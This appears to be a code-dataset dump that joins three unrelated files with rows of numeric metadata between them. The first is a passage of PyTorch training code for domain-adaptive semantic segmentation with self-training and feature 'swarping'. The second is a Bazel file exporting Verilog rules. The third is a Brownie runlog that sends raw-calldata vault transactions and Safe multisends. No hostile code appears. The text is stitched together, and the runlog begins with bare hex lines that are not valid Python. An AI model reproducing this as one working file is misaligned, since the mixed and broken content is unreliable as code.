_, batch = targetloader_iter.__next__()
# images, images_rev, _, _, name, name_next = batch # contrastive learning
images, _, _, _ = batch
feat_trg_main, pred_trg_main = model(images.cuda(device))
pred_trg_main = interp_target(pred_trg_main)
####### Fixed model target inference #######
with torch.no_grad():
feat_trg_main_st, pred_trg_main_st = model_st(images.cuda(device))
pred_trg_main_st = interp_target(pred_trg_main_st)
####### pseudo label generator for target #######
label_trg, cls_thresh = label_generator(pred_trg_main_st, cls_thresh, cfg, i_iter, total_iter)
##### CE loss for trg : Confidence Regularized Self-Training #######
####### MRKLD + Ign Region for target segmentation TODO: understanding this parts!!
loss_seg_trg_main = reg_loss_calc_ign(pred_trg_main, label_trg, device)
loss_tgt_seg = cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_trg_main
####### Domain Swarping #######
feat_trg_swarped, target_cut_thresh, target_label = DomainSwarping(feat_trg_main, label_trg, target_cut_thresh, device)
ignore_mask = (target_label == 255)
feat_trg_swarped = (~ignore_mask * feat_trg_swarped) + (ignore_mask * feat_trg_main)
pred_trg_swarped = model.classifier_(feat_trg_swarped)
pred_trg_swarped = interp_target(pred_trg_swarped)
###### MRKLD + ign loss for swarped target segmentation #######
loss_seg_trg_swarped = reg_loss_calc_ign(pred_trg_swarped, label_trg, device)
loss_tgt_seg_swarped = cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_trg_swarped
loss_tgt = loss_tgt_seg + loss_tgt_seg_swarped
loss_tgt.backward()
optimizer.step()
current_losses = {'loss_seg_trg_main': loss_seg_trg_main,
'loss_seg_src_main': loss_seg_src_main,
'loss_seg_trg_swarped': loss_seg_trg_swarped
}
print_losses(current_losses, i_iter)
if i_iter % cfg.TRAIN.SAVE_PRED_EVERY == 0 and i_iter != 0:
print('taking snapshot ...')
print('exp =', cfg.TRAIN.SNAPSHOT_DIR)
snapshot_dir = Path(cfg.TRAIN.SNAPSHOT_DIR)
torch.save(model.state_dict(), snapshot_dir / f'model_{i_iter}.pth')
torch.save(model_st.state_dict(), snapshot_dir / f'model_{i_iter}_st.pth')
if i_iter >= cfg.TRAIN.EARLY_STOP - 1:
break
sys.stdout.flush()
# Visualize with tensorboard
if viz_tensorboard:
log_losses_tensorboard(writer, current_losses, i_iter)
if i_iter % cfg.TRAIN.TENSORBOARD_VIZRATE == cfg.TRAIN.TENSORBOARD_VIZRATE - 1:
# draw_in_tensorboard(writer, images_source, i_iter, pred_src_main, num_classes, 'S')
st_draw_in_tensorboard_trans(writer, images, label_trg, i_iter, pred_trg_main, pred_trg_swarped, num_classes, 'T')
# TODO: Instance-wise Self-Training for boundary VGG
def train_Boundary_IST_vgg(model, trainloader, targetloader, cfg):
'''
UDA training with advent
'''
# Create the model and start the training.
input_size_source = cfg.TRAIN.INPUT_SIZE_SOURCE
input_size_target = cfg.TRAIN.INPUT_SIZE_TARGET
device = cfg.GPU_ID
num_classes = cfg.NUM_CLASSES
viz_tensorboard = os.path.exists(cfg.TRAIN.TENSORBOARD_LOGDIR)
if viz_tensorboard:
writer = SummaryWriter(log_dir=cfg.TRAIN.TENSORBOARD_LOGDIR)
# SEGMNETATION NETWORK
model.train()
model.to(device)
# pre-trained model for Self-Training
model_st = deepcopy(model)
model_st.eval()
model_st.to(device)
# target class-wise cutting threshold dictionary
target_cut_thresh = {}
cls_thresh = torch.ones(num_classes).type(torch.float32)
cudnn.benchmark = True
cudnn.enabled = True
# OPTIMIZERS
# segnet's optimizer
optimizer = optim.SGD(model.optim_parameters(cfg.TRAIN.LEARNING_RATE),
lr=cfg.TRAIN.LEARNING_RATE,
momentum=cfg.TRAIN.MOMENTUM,
weight_decay=cfg.TRAIN.WEIGHT_DECAY)
# interpolate output segmaps
interp = nn.Upsample(size=(input_size_source[1], input_size_source[0]), mode='bilinear',
align_corners=True)
interp_target = nn.Upsample(size=(input_size_target[1], input_size_target[0]), mode='bilinear',
align_corners=True)
trainloader_iter = enumerate(trainloader)
targetloader_iter = enumerate(targetloader)
# Iteration follow the targetloader size
total_iter = len(targetloader)
for i_iter in tqdm(range(total_iter)):
# reset optimizers
optimizer.zero_grad()
# adapt LR if needed
adjust_learning_rate(optimizer, i_iter, cfg)
# UDA Training
_, batch = trainloader_iter.__next__()
images_source, labels, _, weather_name = batch
_, pred_src_main, pred_src_boundary = model(images_source.cuda(device))
###########################
# train on source for Seg #
###########################
# Boundary Training
pred_src_boundary = interp(pred_src_boundary)
loss_boundary_src_main, boundary_targets = boundary_loss_func(pred_src_boundary, labels, cfg.TRAIN.BOUNDARY_LOSS, cfg.TRAIN.LAMBDA_DICE)
# Segmentation Training
pred_src_main = interp(pred_src_main)
loss_seg_src_main = loss_calc(pred_src_main, labels, device)
loss = (cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_src_main +
cfg.TRAIN.LAMBDA_BOUNDARY * loss_boundary_src_main)
loss.backward()
current_losses = {'loss_seg_src_main': loss_seg_src_main}
if cfg.TRAIN.BOUNDARY_LOSS == "BCE":
current_losses['loss_boundary_BCE_{}'.format(cfg.TRAIN.LAMBDA_BOUNDARY)] = loss_boundary_src_main
elif cfg.TRAIN.BOUNDARY_LOSS == "DICE":
current_losses['loss_boundary_DICE_{}'.format(cfg.TRAIN.LAMBDA_BOUNDARY)] = loss_boundary_src_main
elif cfg.TRAIN.BOUNDARY_LOSS == "BCE+DICE":
current_losses['loss_boundary_BCE+DICE_{}'.format(cfg.TRAIN.LAMBDA_BOUNDARY)] = loss_boundary_src_main
else:
raise NotImplementedError(f"Not yet supported {cfg.TRAIN.BOUNDARY_LOSS}")
current_losses['loss_boundary_src_main'] = cfg.TRAIN.LAMBDA_BOUNDARY * loss_boundary_src_main
###################################
# Self-training generator #
###################################
####### Target inference #######
_, batch = targetloader_iter.__next__()
# images, images_rev, _, _, name, name_next = batch # contrastive learning
images, _, _, _ = batch
_, pred_trg_main, feat_trg_main, pred_trg_boundary = model(images.cuda(device))
pred_trg_main = interp_target(pred_trg_main)
pred_trg_boundary = interp_target(pred_trg_boundary)
####### Fixed model target inference #######
with torch.no_grad():
_, pred_trg_main_st, feat_trg_main_st, pred_trg_boundary = model_st(images.cuda(device))
pred_trg_main_st = interp_target(pred_trg_main_st)
####### pseudo label generator for target #######
label_trg, cls_thresh = label_generator(pred_trg_main_st, cls_thresh, cfg, i_iter, total_iter)
##### CE loss for target segmentation #######
####### MRKLD + Ign Region for target segmentation TODO: understanding this parts!!
loss_seg_trg_main = reg_loss_calc_ign(pred_trg_main, label_trg, device)
loss_tgt_seg = cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_trg_main
####### Domain Swarping #######
feat_trg_swarped, target_cut_thresh, target_label = DomainSwarping(feat_trg_main, label_trg, target_cut_thresh, device)
ignore_mask = (target_label == 255)
feat_trg_swarped = (~ignore_mask * feat_trg_swarped) + (ignore_mask * feat_trg_main)
pred_trg_swarped = model.classifier_(feat_trg_swarped)
pred_trg_swarped = interp_target(pred_trg_swarped)
###### MRKLD + ign loss for swarped target segmentation #######
loss_seg_trg_swarped = reg_loss_calc_ign(pred_trg_swarped, label_trg, device)
loss_tgt_seg_swarped = cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_trg_swarped
loss_tgt = loss_tgt_seg + loss_tgt_seg_swarped
loss_tgt.backward()
optimizer.step()
current_losses = {'loss_seg_trg_main': loss_seg_trg_main,
'loss_seg_src_main': loss_seg_src_main,
'loss_seg_trg_swarped': loss_seg_trg_swarped
}
print_losses(current_losses, i_iter)
if i_iter % cfg.TRAIN.SAVE_PRED_EVERY == 0 and i_iter != 0:
print('taking snapshot ...')
print('exp =', cfg.TRAIN.SNAPSHOT_DIR)
snapshot_dir = Path(cfg.TRAIN.SNAPSHOT_DIR)
torch.save(model.state_dict(), snapshot_dir / f'model_{i_iter}.pth')
torch.save(model_st.state_dict(), snapshot_dir / f'model_{i_iter}_st.pth')
if i_iter >= cfg.TRAIN.EARLY_STOP - 1:
break
sys.stdout.flush()
# Visualize with tensorboard
if viz_tensorboard:
log_losses_tensorboard(writer, current_losses, i_iter)
if i_iter % cfg.TRAIN.TENSORBOARD_VIZRATE == cfg.TRAIN.TENSORBOARD_VIZRATE - 1:
draw_in_tensorboard(writer, images_source, i_iter, pred_src_main, num_classes, 'S', pred_src_boundary, boundary_targets)
# draw_in_tensorboard(writer, images, label_trg, i_iter, pred_trg_main, pred_tgt_swarped, num_classes, 'T')
###########################################################################################
def label_generator(pred_trg, cls_thresh_tot, cfg, i_iter, tot_iter):
import math
device = cfg.GPU_ID
### ###
output_main = F.softmax(pred_trg, dim=1)
amax_output = torch.argmax(output_main, dim=1).type(torch.uint8)
pred_label_trainIDs = amax_output.clone()
pred_label = amax_output.clone()
conf, _ = torch.max(output_main, dim=1)
conf_dict = {k: [] for k in range(cfg.NUM_CLASSES)}
pred_cls_num = torch.zeros(cfg.NUM_CLASSES)
for idx_cls in range(cfg.NUM_CLASSES):
idx_temp = pred_label == idx_cls
pred_cls_num[idx_cls] = pred_cls_num[idx_cls] + torch.sum(idx_temp)
if idx_temp.any():
conf_cls_temp = conf[idx_temp].type(torch.float32)
len_cls_temp = len(conf_cls_temp)
conf_cls = conf_cls_temp[0:len_cls_temp:16]
conf_dict[idx_cls].extend(conf_cls)
cls_thresh = torch.ones(cfg.NUM_CLASSES).type(torch.float32)
cls_sel_size = torch.zeros(cfg.NUM_CLASSES).type(torch.float32)
tgt_dict_tot = {}
for idx_cls in range(cfg.NUM_CLASSES):
if conf_dict[idx_cls] != None:
# conf_dict[idx_cls].sort(reverse=True) # sort in descending order
conf_dict[idx_cls], _ = torch.sort(torch.FloatTensor(conf_dict[idx_cls]), descending=True)
len_cls = len(conf_dict[idx_cls])
iter_ratio = 1.0 - float(i_iter / (tot_iter + 1))
coeff = 0.2 * (iter_ratio ** 0.5)
cls_sel_size[idx_cls] = int(math.floor(len_cls * coeff))
len_cls_thresh = int(cls_sel_size[idx_cls])
if len_cls_thresh != 0:
cls_thresh[idx_cls] = conf_dict[idx_cls][len_cls_thresh - 1]
conf_dict[idx_cls] = None
cls_thresh_tot_ = torch.where(cls_thresh_tot == 1.0, cls_thresh, 0.9 * cls_thresh_tot + 0.1 * cls_thresh)
cls_thresh_mask = (cls_thresh == 1.0) * (cls_thresh_tot != 1.0)
cls_thresh_tot = torch.where(cls_thresh_mask == 1.0, cls_thresh_tot, cls_thresh_tot_)
weighted_prob = output_main / cls_thresh_tot.to(device).unsqueeze(0).unsqueeze(2).unsqueeze(3)
weighted_pred_trainIDs = torch.argmax(weighted_prob, dim=1).type(torch.uint8)
weighted_conf, _ = torch.max(weighted_prob, dim=1)
weighted_pred_trainIDs[weighted_conf < 1] = 255
return weighted_pred_trainIDs, cls_thresh_tot
def DomainSwarping(tgt_feat_warped_cat, tgt_label, tgt_dict_tot, device):
alpha_list = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]
alpha = random.choice(alpha_list)
tgt_label = F.interpolate(tgt_label.unsqueeze(0).float(), (tgt_feat_warped_cat.size(2), tgt_feat_warped_cat.size(3)), mode='nearest')
tgt_label = tgt_label.long()
tgt_unique = torch.unique(tgt_label)
tgt_dict = {}
tgt_dict_tot_temp = {}
m = nn.AdaptiveAvgPool2d(1)
new_masked_tgt_init = 0
for label_ele in tgt_unique.tolist():
if not label_ele == 255:
cls_mask = tgt_label == label_ele
masked_tgt = cls_mask * tgt_feat_warped_cat
avg_masked_tgt = m(masked_tgt) * (cls_mask.size(2) * cls_mask.size(3) / cls_mask.sum())
tgt_dict[label_ele] = avg_masked_tgt
if not label_ele in tgt_dict_tot:
print('new class info inserted')
tgt_dict_tot[label_ele] = tgt_dict[label_ele]
# new_masked_tgt = alpha * tgt_dict_tot[label_ele] + (1-alpha) * masked_tgt
new_masked_tgt = tgt_dict_tot[label_ele]
new_masked_tgt_init += cls_mask * new_masked_tgt # (1, 1024, 67, 120) = (1, 1, 67, 120) * (1, 1024, 1, 1)
tgt_dict_tot[label_ele] = alpha * tgt_dict_tot[label_ele] + (1-alpha) * tgt_dict[label_ele]
tgt_dict_tot[label_ele] = tgt_dict_tot[label_ele].detach()
return new_masked_tgt_init, tgt_dict_tot, tgt_label
def draw_in_tensorboard(writer, images, i_iter, pred_main, num_classes, type_, pred_src_boundary=None, boundary_targets=None):
grid_image = make_grid(images[:3].clone().cpu().data, 3, normalize=True)
writer.add_image(f'Image - {type_}', grid_image, i_iter)
grid_image = make_grid(torch.from_numpy(np.array(colorize_mask(np.asarray(
np.argmax(F.softmax(pred_main).cpu().data[0].numpy().transpose(1, 2, 0),
axis=2), dtype=np.uint8)).convert('RGB')).transpose(2, 0, 1)), 3,
normalize=False, range=(0, 255))
writer.add_image(f'Prediction - {type_}', grid_image, i_iter)
output_sm = F.softmax(pred_main).cpu().data[0].numpy().transpose(1, 2, 0)
output_ent = np.sum(-np.multiply(output_sm, np.log2(output_sm)), axis=2,
keepdims=False)
grid_image = make_grid(torch.from_numpy(output_ent), 3, normalize=True,
range=(0, np.log2(num_classes)))
writer.add_image(f'Entropy - {type_}', grid_image, i_iter)
if pred_src_boundary is not None:
# pred_src_boundary[pred_src_boundary >= 0.5] = 1
# pred_src_boundary[pred_src_boundary < 0.5] = 0
grid_image = make_grid(torch.from_numpy(pred_src_boundary.detach().cpu().numpy().squeeze(0).squeeze(0)), 3, normalize=True)
writer.add_image(f'Boundary - {type_}', grid_image, i_iter)
if boundary_targets is not None:
grid_image = make_grid(torch.from_numpy(boundary_targets.detach().cpu().numpy().squeeze(0).squeeze(0)), 3,
normalize=True)
writer.add_image(f'BoundaryGT - {type_}', grid_image, i_iter)
def st_draw_in_tensorboard_trans(writer, images, label_trg, i_iter, pred_main, pred_main_swarp, num_classes, type_):
grid_image = make_grid(images[:3].clone().cpu().data, 3, normalize=True)
writer.add_image(f'Image - {type_}', grid_image, i_iter)
pred_main_cat = torch.cat((pred_main, pred_main_swarp), dim=-1)
grid_image = make_grid(torch.from_numpy(np.array(colorize_mask(np.asarray(
np.argmax(F.softmax(pred_main_cat).cpu().data[0].numpy().transpose(1, 2, 0),
axis=2), dtype=np.uint8)).convert('RGB')).transpose(2, 0, 1)), 3,
normalize=False, range=(0, 255))
writer.add_image(f'Prediction_main_swarp - {type_}', grid_image, i_iter)
grid_image = make_grid(torch.from_numpy(np.array(colorize_mask(np.asarray(label_trg.cpu().squeeze(), dtype=np.uint8)).convert('RGB')).transpose(2, 0, 1)), 3,
normalize=False, range=(0, 255))
writer.add_image(f'Labels_IAST - {type_}', grid_image, i_iter)
# grid_image = make_grid(torch.from_numpy(np.array(colorize_mask(np.asarray(
# np.argmax(F.softmax(pred_main_tgt).cpu().data[0].numpy().transpose(1, 2, 0),
# axis=2), dtype=np.uint8)).convert('RGB')).transpose(2, 0, 1)), 3,
# normalize=False, range=(0, 255))
# writer.add_image(f'Prediction_swarped - {type_}', grid_image, i_iter)
# output_sm = F.softmax(pred_main).cpu().data[0].numpy().transpose(1, 2, 0)
# output_ent = np.sum(-np.multiply(output_sm, np.log2(output_sm)), axis=2,
# keepdims=False)
# grid_image = make_grid(torch.from_numpy(output_ent), 3, normalize=True,
# range=(0, np.log2(num_classes)))
# writer.add_image(f'Entropy - {type_}', grid_image, i_iter)
def train_minent(model, trainloader, targetloader, cfg):
''' UDA training with minEnt
'''
# Create the model and start the training.
input_size_source = cfg.TRAIN.INPUT_SIZE_SOURCE
input_size_target = cfg.TRAIN.INPUT_SIZE_TARGET
device = cfg.GPU_ID
num_classes = cfg.NUM_CLASSES
viz_tensorboard = os.path.exists(cfg.TRAIN.TENSORBOARD_LOGDIR)
if viz_tensorboard:
writer = SummaryWriter(log_dir=cfg.TRAIN.TENSORBOARD_LOGDIR)
# SEGMNETATION NETWORK
model.train()
model.to(device)
cudnn.benchmark = True
cudnn.enabled = True
# OPTIMIZERS
# segnet's optimizer
optimizer = optim.SGD(model.optim_parameters(cfg.TRAIN.LEARNING_RATE),
lr=cfg.TRAIN.LEARNING_RATE,
momentum=cfg.TRAIN.MOMENTUM,
weight_decay=cfg.TRAIN.WEIGHT_DECAY)
# interpolate output segmaps
interp = nn.Upsample(size=(input_size_source[1], input_size_source[0]), mode='bilinear',
align_corners=True)
interp_target = nn.Upsample(size=(input_size_target[1], input_size_target[0]), mode='bilinear',
align_corners=True)
trainloader_iter = enumerate(trainloader)
targetloader_iter = enumerate(targetloader)
for i_iter in tqdm(range(cfg.TRAIN.EARLY_STOP)):
# reset optimizers
optimizer.zero_grad()
# adapt LR if needed
adjust_learning_rate(optimizer, i_iter, cfg)
# UDA Training
# train on source
_, batch = trainloader_iter.__next__()
images_source, labels, _, _ = batch
pred_src_aux, pred_src_main = model(images_source.cuda(device))
if cfg.TRAIN.MULTI_LEVEL:
pred_src_aux = interp(pred_src_aux)
loss_seg_src_aux = loss_calc(pred_src_aux, labels, device)
else:
loss_seg_src_aux = 0
pred_src_main = interp(pred_src_main)
loss_seg_src_main = loss_calc(pred_src_main, labels, device)
loss = (cfg.TRAIN.LAMBDA_SEG_MAIN * loss_seg_src_main
+ cfg.TRAIN.LAMBDA_SEG_AUX * loss_seg_src_aux)
loss.backward()
# adversarial training with minent
_, batch = targetloader_iter.__next__()
images, _, _, _ = batch
pred_trg_aux, pred_trg_main = model(images.cuda(device))
pred_trg_aux = interp_target(pred_trg_aux)
pred_trg_main = interp_target(pred_trg_main)
pred_prob_trg_aux = F.softmax(pred_trg_aux)
pred_prob_trg_main = F.softmax(pred_trg_main)
loss_target_entp_aux = entropy_loss(pred_prob_trg_aux)
loss_target_entp_main = entropy_loss(pred_prob_trg_main)
loss = (cfg.TRAIN.LAMBDA_ENT_AUX * loss_target_entp_aux
+ cfg.TRAIN.LAMBDA_ENT_MAIN * loss_target_entp_main)
loss.backward()
optimizer.step()
current_losses = {'loss_seg_src_aux': loss_seg_src_aux,
'loss_seg_src_main': loss_seg_src_main,
'loss_ent_aux': loss_target_entp_aux,
'loss_ent_main': loss_target_entp_main}
print_losses(current_losses, i_iter)
if i_iter % cfg.TRAIN.SAVE_PRED_EVERY == 0 and i_iter != 0:
print('taking snapshot ...')
print('exp =', cfg.TRAIN.SNAPSHOT_DIR)
torch.save(model.state_dict(),
osp.join(cfg.TRAIN.SNAPSHOT_DIR, f'model_{i_iter}.pth'))
if i_iter >= cfg.TRAIN.EARLY_STOP - 1:
break
sys.stdout.flush()
# Visualize with tensorboard
if viz_tensorboard:
log_losses_tensorboard(writer, current_losses, i_iter)
if i_iter % cfg.TRAIN.TENSORBOARD_VIZRATE == cfg.TRAIN.TENSORBOARD_VIZRATE - 1:
draw_in_tensorboard(writer, images, i_iter, pred_trg_main, num_classes, 'T')
draw_in_tensorboard(writer, images_source, i_iter, pred_src_main, num_classes, 'S')
def print_losses(current_losses, i_iter):
list_strings = []
for loss_name, loss_value in current_losses.items():
list_strings.append(f'{loss_name} = {to_numpy(loss_value):.3f} ')
full_string = ' '.join(list_strings)
tqdm.write(f'iter = {i_iter} {full_string}')
def log_losses_tensorboard(writer, current_losses, i_iter):
for loss_name, loss_value in current_losses.items():
writer.add_scalar(f'data/{loss_name}', to_numpy(loss_value), i_iter)
def to_numpy(tensor):
if isinstance(tensor, (int, float)):
return tensor
else:
return tensor.data.cpu().numpy()
def train_domain_adaptation(model, trainloader, targetloader, cfg):
if cfg.TRAIN.MODEL == 'DeepLabv2':
if cfg.TRAIN.DA_METHOD == 'MinEnt':
train_minent(model, trainloader, targetloader, cfg)
elif cfg.TRAIN.DA_METHOD == 'AdvEnt':
train_advent(model, trainloader, targetloader, cfg)
elif cfg.TRAIN.MODEL == 'DeepLabv2_VGG':
if cfg.TRAIN.DA_METHOD == 'source_only':
if cfg.TRAIN.OCDA_METHOD == 'baseline':
train_vgg(model, trainloader, targetloader, cfg)
elif cfg.TRAIN.OCDA_METHOD == 'boundary' or cfg.TRAIN.OCDA_METHOD == 'ad_boundary' or cfg.TRAIN.OCDA_METHOD == 'attn_boundary':
train_Boundary_vgg(model, trainloader, targetloader, cfg)
elif cfg.TRAIN.OCDA_METHOD == 'selfTrain' or cfg.TRAIN.OCDA_METHOD == 'selfTrain_boundary':
train_IST_vgg(model, trainloader, targetloader, cfg)
elif cfg.TRAIN.DA_METHOD == 'AdapSeg' or cfg.TRAIN.DA_METHOD == 'AdvEnt':
if cfg.TRAIN.OCDA_METHOD == 'baseline':
train_advent_vgg(model, trainloader, targetloader, cfg)
elif cfg.TRAIN.OCDA_METHOD == 'boundary' or cfg.TRAIN.OCDA_METHOD == 'ad_boundary' or cfg.TRAIN.OCDA_METHOD == 'attn_boundary':
if cfg.TRAIN.OPTION == 'twinD':
train_Boundary_advent_vgg(model, trainloader, targetloader, cfg)
elif cfg.TRAIN.OPTION == 'segOnlyD':
train_ad_Boundary_advent_vgg(model, trainloader, targetloader, cfg)
elif cfg.TRAIN.OPTION == 'catOutD':
train_cat_Boundary_advent_vgg(model, trainloader, targetloader, cfg)
elif cfg.TRAIN.OCDA_METHOD == 'selfTrain':
train_IST_vgg(model, trainloader, targetloader, cfg)
else:
raise NotImplementedError(
f"Not yet supported !OCDA! method {cfg.TRAIN.MODEL}_{cfg.TRAIN.DA_METHOD}_{cfg.TRAIN.OCDA_METHOD}")
else:
raise NotImplementedError(f"Not yet supported !DA! method {cfg.TRAIN.MODEL}_{cfg.TRAIN.DA_METHOD}_{cfg.TRAIN.OCDA_METHOD}")
| 42.702895
| 162
| 0.625906
| 9,959
| 78,189
| 4.527262
| 0.039562
| 0.045956
| 0.020982
| 0.01018
| 0.923282
| 0.908444
| 0.895047
| 0.879899
| 0.86617
| 0.85559
| 0
| 0.009087
| 0.262531
| 78,189
| 1,830
| 163
| 42.72623
| 0.772831
| 0.181432
| 0
| 0.787335
| 0
| 0.00189
| 0.039619
| 0.011105
| 0
| 0
| 0
| 0.005464
| 0
| 1
| 0.017013
| false
| 0
| 0.021739
| 0
| 0.042533
| 0.030246
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e250df6cd8010f5e79b7224d76f5e0ab451f0458
| 1,283
|
bzl
|
Python
|
verilog/defs.bzl
|
justin371/rules_verilog
|
e10ec0348a44e3ea95035bd876cc6961b836dfaa
|
[
"Apache-2.0"
] | null | null | null |
verilog/defs.bzl
|
justin371/rules_verilog
|
e10ec0348a44e3ea95035bd876cc6961b836dfaa
|
[
"Apache-2.0"
] | null | null | null |
verilog/defs.bzl
|
justin371/rules_verilog
|
e10ec0348a44e3ea95035bd876cc6961b836dfaa
|
[
"Apache-2.0"
] | null | null | null |
"""Public entry point to all supported Verilog rules and APIs"""
load(
"//verilog/private:verilog.bzl",
_verilog_test = "verilog_test",
_verilog_tool_encapsulation = "verilog_tool_encapsulation",
)
load(
"//verilog/private:rtl.bzl",
_verilog_rtl_cdc_test = "verilog_rtl_cdc_test",
_verilog_rtl_library = "verilog_rtl_library",
_verilog_rtl_lint_test = "verilog_rtl_lint_test",
_verilog_rtl_pkg = "verilog_rtl_pkg",
_verilog_rtl_shell = "verilog_rtl_shell",
_verilog_rtl_unit_test = "verilog_rtl_unit_test",
)
load(
"//verilog/private:dv.bzl",
_verilog_dv_library = "verilog_dv_library",
_verilog_dv_tb = "verilog_dv_tb",
_verilog_dv_test_cfg = "verilog_dv_test_cfg",
_verilog_dv_unit_test = "verilog_dv_unit_test",
)
verilog_tool_encapsulation = _verilog_tool_encapsulation
verilog_test = _verilog_test
verilog_rtl_cdc_test = _verilog_rtl_cdc_test
verilog_rtl_library = _verilog_rtl_library
verilog_rtl_lint_test = _verilog_rtl_lint_test
verilog_rtl_pkg = _verilog_rtl_pkg
verilog_rtl_shell = _verilog_rtl_shell
verilog_rtl_unit_test = _verilog_rtl_unit_test
verilog_dv_library = _verilog_dv_library
verilog_dv_tb = _verilog_dv_tb
verilog_dv_test_cfg = _verilog_dv_test_cfg
verilog_dv_unit_test = _verilog_dv_unit_test
| 32.897436
| 64
| 0.804365
| 185
| 1,283
| 4.843243
| 0.140541
| 0.267857
| 0.171875
| 0.075893
| 0.861607
| 0.821429
| 0.821429
| 0.705357
| 0.705357
| 0.705357
| 0
| 0
| 0.120811
| 1,283
| 38
| 65
| 33.763158
| 0.794326
| 0.045207
| 0
| 0.090909
| 0
| 0
| 0.245283
| 0.11977
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e2b283bd1f7ac114c75f0fa738a71eb5eeb7dd1e
| 13,387
|
py
|
Python
|
brownie/runlogs/2021_12_strategist.py
|
pedrotmr/origin-dollar
|
6695cd5569f7f11ad7261bbd2903ba18979d683a
|
[
"MIT"
] | null | null | null |
brownie/runlogs/2021_12_strategist.py
|
pedrotmr/origin-dollar
|
6695cd5569f7f11ad7261bbd2903ba18979d683a
|
[
"MIT"
] | null | null | null |
brownie/runlogs/2021_12_strategist.py
|
pedrotmr/origin-dollar
|
6695cd5569f7f11ad7261bbd2903ba18979d683a
|
[
"MIT"
] | 1
|
2022-03-27T09:29:21.000Z
|
2022-03-27T09:29:21.000Z
|
0x8d80ff0a0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000022b005b98b3255522e95f842967723ee4cc7dceaa915000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004b3d3d37e00e75d77b1865ae93c7eaa3040b038d7aa7bc02f70000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001047fe2d3930000000000000000000000009c459eeb3fa179a40329b81c1635525e9a0ef094000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000001000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb480000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000174876e800005b98b3255522e95f842967723ee4cc7dceaa9150000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000242cd47c230000000000000000000000000000000000000000000000056bc75e2d63100000000000000000000000000000000000000000000000
0x8d80ff0a 005b98b3255522e95f842967723ee4cc7dceaa915000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004b3d3d37e00e75d77b1865ae93c7eaa3040b038d7aa7bc02f70000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001047fe2d3930000000000000000000000009c459eeb3fa179a40329b81c1635525e9a0ef094000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000001000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb480000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000174876e800005b98b3255522e95f842967723ee4cc7dceaa9150000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000242cd47c230000000000000000000000000000000000000000000000056bc75e2d63100000
#1
from world import *
from ape_safe import ApeSafe
safe = ApeSafe('0xF14BBdf064E3F67f51cd9BD646aE3716aD938FDC')
show_vault_holdings()
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0xb3d3d37e')
strategist.transfer(to=vault_core, data='0x7fe2d3930000000000000000000000009c459eeb3fa179a40329b81c1635525e9a0ef094000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000001000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb480000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000174876e800')
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0x2cd47c2300000000000000000000000000000000000000000000000ad78ebc5ac6200000')
show_vault_holdings()
safe_tx = safe.multisend_from_receipts([history[-3], history[-2], history[-1]], safe_nonce=51)
safe.sign_with_frame(safe_tx)
safe.post_transaction(safe_tx)
#2
from world import *
from ape_safe import ApeSafe
safe = ApeSafe('0xF14BBdf064E3F67f51cd9BD646aE3716aD938FDC')
show_vault_holdings()
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0xb3d3d37e')
strategist.transfer(to=vault_core, data='0x7fe2d3930000000000000000000000009c459eeb3fa179a40329b81c1635525e9a0ef094000000000000000000000000ea2ef2e2e5a749d4a66b41db9ad85a38aa264cb3000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000001000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb480000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000174876e800')
strategist.transfer(to='0x5B98B3255522E95f842967723Ee4Cc7dCEaa9150', data='0x2cd47c23ffffffffffffffffffffffffffffffffffffffffffffffe4e51b291d10b00000')
show_vault_holdings()
